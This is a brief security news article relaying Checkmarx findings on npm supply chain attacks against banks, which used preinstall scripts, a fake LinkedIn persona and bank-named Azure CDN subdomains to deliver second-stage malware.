Cybersecurity researchers said they have discovered what they say is the first open-source software supply chain attacks specifically targeting the banking sector.
“These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it,” Checkmarx said in a report published last week.
“The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities.”
The npm packages have since been reported and taken down. The names of the packages were not disclosed.
In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the ruse, the threat actor behind it created a fake LinkedIn profile.
Once launched, the script determined the host operating system to see if it was Windows, Linux, or macOS, and proceeded to download a second-stage malware from a remote server by using a subdomain on Azure that incorporated the name of the bank in question.
“The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload,” Checkmarx researchers said. “This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure’s status as a legitimate service.”
images from Hacker News